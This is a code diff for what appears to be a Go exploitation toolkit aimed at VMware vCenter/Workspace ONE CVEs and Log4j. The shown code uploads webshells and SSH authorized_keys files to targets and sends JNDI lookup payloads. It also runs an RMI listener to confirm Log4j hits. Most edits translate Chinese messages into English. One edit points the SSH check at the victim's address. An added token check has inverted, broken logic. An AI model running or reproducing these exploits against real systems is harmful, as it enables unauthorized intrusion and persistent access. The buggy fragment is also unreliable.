1.3.6

src/c22972/c22972.go

@@ -3,12 +3,11 @@ package c22972
 /* cve-2022-31656 too*/
 import (
 	"fmt"
+	"github.com/imroc/req/v3"
 	"os"
 	"regexp"
 	"strings"
 	"time"
-
-	"github.com/imroc/req/v3"
 )
 
 func Start(url, host, cve string) {
@@ -62,7 +61,14 @@ func Exploit(url, host string) {
 	}
 
 	content := resp.String()
-	xsrf_token := resp.Cookies()[1].Value
+	xsrf_token := ""
+	if len(resp.Cookies()) <= 1 {
+		xsrf_token = resp.Cookies()[1].Value
+	} else {
+		fmt.Println("[-] Failed to get xsrf token...")
+		os.Exit(0)
+	}
+
 	data := map[string]string{
 		"protected_state":   "e" + getprotectState(content),
 		"userStoreName":     "System Domain",

src/c_21972/c_21972.go

@@ -95,7 +95,7 @@ func Upload_shell(url string, buf bytes.Buffer) bool {
 	resp, err := client.R().SetFileBytes("uploadFile", "test.tar", buf.Bytes()).Post(url + "/ui/vropspluginui/rest/services/uploadova") // Use R() to create a request.
 	if err != nil {
 		_ = err
-		fmt.Println("[-] 上传失败，请检查网络.")
+		fmt.Println("[-] Upload failure, please check network.")
 		os.Exit(0)
 	}
 	// log.Fatal(err)
@@ -114,7 +114,7 @@ func Upload_windows_shell(url, tar_content string) {
 	buffer := Generate_tar(tar_content, "windows", "?")
 	res := Upload_shell(url, buffer)
 	if !res {
-		fmt.Println("[-] Windows 上传失败，尝试Linux平台...")
+		fmt.Println("[-] Windows Upload failure，try Linux...")
 		return
 	}
 
@@ -128,7 +128,7 @@ func Upload_linux_shell(url, tar_content string) {
 		if Upload_shell(url, buffer) {
 			Check_shell(url, "linux")
 		} else {
-			fmt.Println("[-] Linux 上传失败.")
+			fmt.Println("[-] Linux pload failure.")
 			return
 		}
 
@@ -144,13 +144,14 @@ func Upload_linux_shell(url, tar_content string) {
 }
 
 func Upload_ssh_authorized_keys(url, tar_content string) {
+	target_ip := strings.Replace(url, "https://", "", 1)
 	buffer := Generate_tar(tar_content, "ssh", "?")
 	success := Upload_shell(url, buffer)
 	if !success {
-		fmt.Println("上传失败.")
+		fmt.Println("Upload failure.")
 		return
 	}
-	cmd := exec.Command("ssh", "vsphere-ui@192.168.159.159", "whoami")
+	cmd := exec.Command("ssh", "vsphere-ui@"+target_ip, "whoami")
 	output, err := cmd.Output()
 
 	if err != nil {
@@ -159,9 +160,9 @@ func Upload_ssh_authorized_keys(url, tar_content string) {
 	// 因为结果是字节数组，需要转换成string
 	res := strings.Replace((string(output)), "\n", "", 1)
 	if res == "vsphere-ui" {
-		fmt.Println("上传成功, 用户名: vsphere-ui")
+		fmt.Println("Upload success, UserName: vsphere-ui")
 	} else {
-		fmt.Println("利用失败.")
+		fmt.Println("Exploit failure.")
 		os.Exit(0)
 	}
 
@@ -185,13 +186,13 @@ func Check_shell(url string, os_name string) {
 	}
 	resp, err := client.R().Get(shell_url) // Use R() to create a request.
 	if err != nil {
-		fmt.Println("请检查网络.")
+		fmt.Println("Please check network.")
 		os.Exit(0)
 	}
 	a := resp.StatusCode
 
 	if a == 200 {
-		fmt.Println("[+] 上传成功, " + shell_url)
+		fmt.Println("[+] Upload success, " + shell_url)
 		os.Exit(0)
 
 	} else {

src/c_21985/c_21985.go

@@ -39,13 +39,13 @@ func Upload(url, b64_str string) {
 	resp, err := client.R().SetContentType("application/json").SetBodyString(jsonText).Post(tarGet)
 	if err != nil {
 		_ = err
-		fmt.Println("[-] 上传失败，请检查网络.")
+		fmt.Println("[-] Upload failure, please check network.")
 		os.Exit(0)
 	}
 	if resp.StatusCode == 200 {
-		fmt.Println("[+] 上传成功，开始命令执行.")
+		fmt.Println("[+] Upload success, try command execute.")
 	} else {
-		fmt.Println("[-] 上传失败，目标不存在漏洞.")
+		fmt.Println("[-] Exploit failure, There are no vulnerabilities in the target.")
 		os.Exit(0)
 	}
 
@@ -67,7 +67,7 @@ func Execute(url string) {
 	client.DisableKeepAlives()
 	resp, err := client.R().SetContentType("application/json").SetBody(jsonText).Post(tarGet)
 	if err != nil {
-		fmt.Println("[-] 命令执行失败，请检查网络.")
+		fmt.Println("[-] Command execution failed, Please check network.")
 		os.Exit(0)
 	}
 	_ = err
@@ -147,27 +147,27 @@ func send(url, uri, json_body string) {
 	resp, err := client.R().SetBodyJsonString(json_body).Post(url + base + uri)
 	if err != nil {
 		log.Fatal(err)
-		fmt.Println("[-] 连接失败，请检查网络.")
+		fmt.Println("[-] Connection failure, please check network.")
 		os.Exit(0)
 
 	}
 	if uri == "/invoke" {
 		if resp.StatusCode == 200 {
 			return
 		} else {
-			fmt.Println("[-] 利用失败.")
+			fmt.Println("[-] Exploit failure.")
 			os.Exit(0)
 		}
 	}
 	if !strings.Contains(resp.String(), "result") {
-		fmt.Println("[-] 利用失败.")
+		fmt.Println("[-] Exploit failure.")
 		os.Exit(0)
 	}
 }
 
 func Exploit(url, payload string) {
 
-	fmt.Println("[*] 正在发送payload...")
+	fmt.Println("[*] Sending payload...")
 	uris := []string{"/setTargetObject", "/setStaticMethod", "/setTargetMethod", "/setArguments", "/prepare", "/invoke"}
 	send(url, uris[0], "{\"methodInput\": [null]}")
 	send(url, uris[1], "{\"methodInput\": [\"javax.naming.InitialContext.doLookup\"]}")

src/c_22005/c_22005.go

@@ -67,7 +67,7 @@ func Create_agent(url, log_param, agent_name string) {
 		if strings.Contains(err.Error(), "Timeout") {
 
 		} else {
-			fmt.Println("[-] 上传失败，请检查网络.")
+			fmt.Println("[-] Upload failure, please check network.")
 			os.Exit(0)
 		}
 
@@ -116,16 +116,16 @@ func Upload_shell(url, log_param, agent_name, wb_str string) {
 		if strings.Contains(err.Error(), "Timeout") {
 
 		} else {
-			fmt.Println("[-] 上传失败，请检查网络.")
+			fmt.Println("[-] Upload failure, please check network.")
 			os.Exit(0)
 		}
 	}
 	if resp.StatusCode == 201 || resp.StatusCode == 200 {
 
-		fmt.Println("[+] 上传成功，检查Webshell...")
+		fmt.Println("[+] Upload success，check Webshell...")
 	} else {
 		// fmt.Println(resp.StatusCode)
-		fmt.Println("[-] 上传失败.")
+		fmt.Println("[-] Upload failure.")
 		os.Exit(0)
 	}
 
@@ -213,7 +213,7 @@ func Check(url string) {
 		fmt.Println("[+] shell url: " + shell_url)
 
 	} else {
-		fmt.Println("[-] 利用失败0.0")
+		fmt.Println("[-] Exploit failure 0.0")
 	}
 }
 
@@ -223,7 +223,7 @@ func Test(url, filename string) {
 	Create_agent(url, log_param, agent_name)
 	ss, err := ioutil.ReadFile(filename)
 	if err != nil {
-		fmt.Println("[-] 读取文件失败.")
+		fmt.Println("[-] Read file failure.")
 		os.Exit(0)
 	}
 	s := string(ss)

src/log4jcenter/log4j.go

@@ -19,27 +19,27 @@ var wg sync.WaitGroup
 func rmiServer() {
 	service := ":4398"
 	tcpAddr, err := net.ResolveTCPAddr("tcp4", service)
-	fmt.Println("[*] 启动端口监听.")
+	fmt.Println("[*] Start listen.")
 	socket, err := net.ListenTCP("tcp", tcpAddr)
 	if err != nil {
-		fmt.Println("[-] 监听端口失败,请检查是否被占用.")
+		fmt.Println("[-] error, please check if the port is occupied.")
 	}
 	conn, err := socket.Accept()
 	if err != nil {
-		fmt.Println("[-] 监听端口失败,请检查是否被占用.")
+		fmt.Println("[-] error, please check if the port is occupied.")
 	}
 	data_byte := [1024]byte{}
 	data, err := conn.Read(data_byte[:])
 	if err != nil {
-		fmt.Println("[-] 接收失败,请检查是否被占用.")
+		fmt.Println("[-] Failure to receive.")
 	}
 	_ = data
 	if firstCheck(data_byte[:]) {
-		fmt.Println("[+] 收到rmi请求")
-		fmt.Println("[+] 目标存在log4j.")
+		fmt.Println("[+] Rmi request received")
+		fmt.Println("[+] Log4j check success.")
 
 	} else {
-		fmt.Println("[*] 收到非rmi请求")
+		fmt.Println("[*] A non-RMI request was received.")
 	}
 	conn.Close()
 	wg.Done()
@@ -86,9 +86,9 @@ func StartScan(url string) {
 }
 
 func StartExploit(url, rmiserv string) {
-	fmt.Println("[*] 正在发送payload...")
+	fmt.Println("[*] Sending payload...")
 	exploit(url, rmiserv)
-	fmt.Println("[*] 发送完成，请检查.")
+	fmt.Println("[*] Send completed, please check.")
 }
 
 func check_alive(url string) {
@@ -99,7 +99,7 @@ func check_alive(url string) {
 	resp, err := client.R().
 		SetHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36").Get(url)
 	if err != nil {
-		fmt.Println("[-] 连接失败，请检查网络.")
+		fmt.Println("[-] Connection failure, please check network.")
 		os.Exit(0)
 	}
 	_ = resp
@@ -217,7 +217,7 @@ func Execc(url, rmiserver, command string) {
 		return
 	}
 
-	fmt.Println("[-] 利用失败或不存在漏洞.")
+	fmt.Println("[-] Exploit failure.")
 }
 
 func getIpAddr2(url string) string {